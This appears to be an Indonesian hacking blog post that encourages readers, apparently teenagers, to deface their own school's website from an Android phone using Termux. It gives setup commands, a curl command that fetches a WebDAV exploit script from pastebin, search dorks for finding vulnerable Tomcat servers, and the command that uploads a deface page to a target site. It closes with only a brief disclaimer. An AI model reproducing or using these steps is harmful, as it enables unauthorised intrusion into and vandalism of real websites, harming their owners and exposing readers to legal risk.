Cara Hack Website Dengan Android Termux

Cara Hack Website Sekolah Hanya Dengan Android Menggunakan Termux

Sobat mixotekno, pastinya pernah dengar dong ada anak umur belasan tahun sudah bisa hack website ternama atau server perusahaan yang sulit diretas? Dan banyak pula dari mereka yang ternyata belajar hacking secara otodidak melalui tutorial-tutorial di google.

Nah, untuk sobat yang tertarik dan ingin belajar tentang dunia hacking, mixotekno punya satu tutorial yang bisa kalian coba. Tak perlu muluk-muluk, dalam tahap awal belajar, bagaimana kalau sobat mencooba untuk hack website sekolah kalian sendiri?

Cara hack situs sekolah kali ini tergolong mudah dan murah loh sob, karena hanya menggunakan smartphone android yang pastinya saat ini sudah sobat miliki. Dan tools yang kita gunakan adalah menggunakan termux. Jika kalian tertarik dengan dunia hacking, sudah pasti familiar dengan tools yang satu ini.

Baca Juga :

So, gak perlu berlama-lama lagi, yuk sama-sama disimak cara meretas situs sekolah lewat android dan praktikan sekarang juga supaya kalian bisa belajar dan lebih jago lago dalam dunia hacking.

Cara Hack Website Dengan Android Termux, Pasti Tembus!

Sob, saat ini teknologi semakin maju, dan ternyata aktivitas hacking juga bisa dilakukan hanya menggunakan smartphone android saja. Kali ini, mixotekno akan jelaskan cara hack sebuah website menggunakan android dengan metode bernama WebDav.

Metode WebDav sendiri sebenarnya adalah metode lama. Namun metode ini kabarnya masih work untuk membobol banyak Website, dan mungkin website sekolah kalian adalah salah satunya.

Oke, sebelum masuk ke tutorialnya, sobat harus menyiapkan beberapa hal berikut ini:

  1. Aplikasi Termux ( Versi Lama ) : Download Di Sini
  2. Smartphone Android
  3. Koneksi Internet
  4. Script Deface
Baca Juga :   Cara Hack Akun Free Fire (FF) Milik Orang Lain Paling Ampuh Terbaru 2020

Cara hack Website Dengan Termux Di HP Android

  1. Buka aplikasi termux di HP sobat.
  2. Install-lah beberapa bahan berikut ini dengan mengetikkan perintah:

    apt install python2;pip2 install urllib3 chardet certifi idna requests;apt install openssl curl;pkg install libcurl

  3. Berikan izin akses ke penyimpanan internal android kalian dengan mengetikkan perintah berikut :

    termux-setup-storage

  4. Pindahkan script deface yang sobat miliki diluar folder di penyimpanan internal.
  5. Download tools WebDav Exploiter, dengan mengetikkan perintah berikut :

    curl -S http://pastebin.com/raw/HnVyQPtR –output wrbdav.py

  6. Setelah itu, sobat bisa mencari target websita yang ingin dihack, dengan menggunakan dork berikut ini, di mesin pencari (Google atau Mesin Pencari Lainnya).

    intitle:”Directory Listing For /” + inurl:webdav tomcat  intitle:”Directory Listing For /” + ara hack website dengan android termux

  7. Copy-paste nama website target sobat, lalu buka kembali aplikasi termux. Ketik perintah berikut untuk menghack atau deface website tersebut :

    python2 webdav.py situstargetkalian.com /sdcard/namascriptdefacekalian.html
    Contoh :
    python2 webdav.py mastahcyber.com /sdcard/mixoteknoscript.html

  8. Jika berhasil, akan muncul tulisan File Uploaded beserta url nya, seperti berikut ini.
  9. Terakhir, silahkan cek website target sudah berhasil dihack atau tidak dengan cara menyalin url hasil hack, lalu buka di browser sobat, jika berhasil akan muncul script deface kalian pada website tersebut, seperti berikut ini. ara hack website dengan android termux

Mudah bukan? Namun sekali lagi, metode ini tidak work 100% untuk membobol semua website yang ada di muka bumi ya guys. Kalau tidak berhasil, artinya level keamanan web target kalian sudah cukup tinggi jadi tidak bisa ditembus dengan cara di atas.

Bijaklah dalam menggunakan tutorial ini, untuk pembelajaran tidak masalah ya sob. Tapi ingat, hacker sejati tidak akan melakukan hacking untuk merugikan pihak lain. Semoga artikel ini bermanfaat untuk sobat mixotekno yang membacanya!